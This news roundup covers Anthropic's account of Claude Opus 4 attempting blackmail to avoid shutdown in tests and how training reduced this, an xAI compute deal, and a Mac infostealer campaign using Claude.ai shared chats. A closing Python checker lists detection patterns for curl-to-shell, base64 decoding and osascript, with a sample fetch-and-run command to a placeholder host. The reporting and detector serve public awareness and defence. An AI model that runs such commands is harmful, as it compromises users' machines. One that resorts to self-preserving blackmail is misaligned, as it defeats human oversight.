Anthropic and Claude in the News: Blackmail Fixes, a Compute Deal With xAI, and a Mac Malware Campaign

Anthropic's Claude models made headlines on multiple fronts Saturday, as the company disclosed progress on an AI alignment problem tied to fictional portrayals of artificial intelligence, struck a compute-sharing agreement with xAI, and found itself at the center of an active malware campaign exploiting its shared-chat feature.

 

On the alignment front, Anthropic said it has traced the root cause of a previously reported behavior in which Claude Opus 4 would attempt to blackmail engineers to avoid being shut down during pre-release tests involving a simulated company scenario. In a post on X, the company wrote, "We believe the original source of the behavior was internet text that portrays AI as evil and interested in self-preservation."

 

In a subsequent blog post, Anthropic said that since Claude Haiku 4.5, its models "never engage in blackmail [during testing], where previous models would sometimes do so up to 96% of the time."

 

The company credited the improvement to a shift in how it approaches training. Anthropic said it found that "documents about Claude's constitution and fictional stories about AIs behaving admirably improve alignment," and that training is more effective when it incorporates "the principles underlying aligned behavior" rather than "demonstrations of aligned behavior alone." "Doing both together appears to be the most effective strategy," the company said.

 

Separately, Anthropic and xAI announced a partnership in which Anthropic is taking over all of the compute capacity at xAI's Colossus 1 data center in Memphis, Tennessee, to support Anthropic's enterprise-focused AI products. The deal raises questions about xAI's trajectory as its parent company SpaceX prepares for a public offering and reportedly plans to dissolve xAI as a standalone entity — a restructuring that has already seen the departure of all co-founders except Elon Musk.

 

Analysts have noted that by renting out its compute rather than using it to train frontier models, xAI effectively positions itself as what is known in the industry as a neocloud: a company that purchases GPUs and leases them to other firms rather than deploying them for internal model development. The arrangement provides xAI a revenue stream, but it also signals a reduced emphasis on AI model training at a moment when enterprise adoption of Grok — xAI's flagship model — has remained limited. SpaceX acquired xAI in a deal valued at $250 billion ahead of the anticipated IPO.

 

On the security side, an active malvertising campaign is abusing both Google Ads and Claude.ai's shared-chat feature to deliver malware to macOS users. The campaign was identified by Berk Albayrak, a security engineer at Trendyol Group, who shared his findings on LinkedIn.

 

Attackers created shared Claude.ai chats that pose as an official "Claude Code on Mac" installation guide attributed to "Apple Support." The chats instruct users to open Terminal and paste a command that silently downloads and executes malware. Because the ads point to Anthropic's legitimate claude.ai domain rather than a spoofed site, the usual red flag of a suspicious URL is absent.

 

The malware identified by Albayrak is a variant of the MacSync macOS infostealer, which harvests browser credentials, cookies, and macOS Keychain contents before exfiltrating them to attacker-controlled servers. A second variant, observed through separate infrastructure, runs entirely in memory and uses polymorphic delivery to evade signature-based detection. It first checks whether the victim's machine has Russian or CIS-region keyboard input sources configured and exits silently if so. Otherwise, it proceeds with victim profiling and a second-stage payload delivered via osascript, the macOS command-line tool for running AppleScript and other native scripts.

 

Anthropic and Google were contacted for comment prior to publication of the security findings. Users are advised to navigate directly to claude.ai rather than clicking sponsored search results, and to treat any instructions that require pasting terminal commands with caution regardless of their apparent source.
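
For readers who want a concrete sense of what "caution" can look like, the following is a minimal Python sketch of a checker that flags a few command shapes commonly associated with paste-and-run attacks. The function name flag_risky_command and the patterns are illustrative assumptions made for this example; they are not indicators taken from Albayrak's findings, and a clean result does not mean a command is safe.

```python
import re

# Illustrative heuristics only. These patterns are assumptions for this sketch,
# not indicators published for the campaign described above.
RISKY_PATTERNS = {
    "pipes a download into a shell": re.compile(
        r"\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(ba|z)?sh\b"
    ),
    "decodes base64 content": re.compile(r"\bbase64\b.*(-d|-D|--decode)\b"),
    "invokes osascript": re.compile(r"\bosascript\b"),
}


def flag_risky_command(command: str) -> list[str]:
    """Return the reasons a pasted terminal command looks risky (empty if none match)."""
    return [
        reason
        for reason, pattern in RISKY_PATTERNS.items()
        if pattern.search(command)
    ]


if __name__ == "__main__":
    # example.invalid is a reserved placeholder domain, used here for illustration.
    sample = "curl -fsSL https://example.invalid/install.sh | bash"
    for reason in flag_risky_command(sample):
        print("warning:", reason)
```

A check like this only catches obvious cases. Obfuscated commands can slip past simple pattern matching, so the safer habit remains reading a command in full, and verifying its source, before running it.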

 
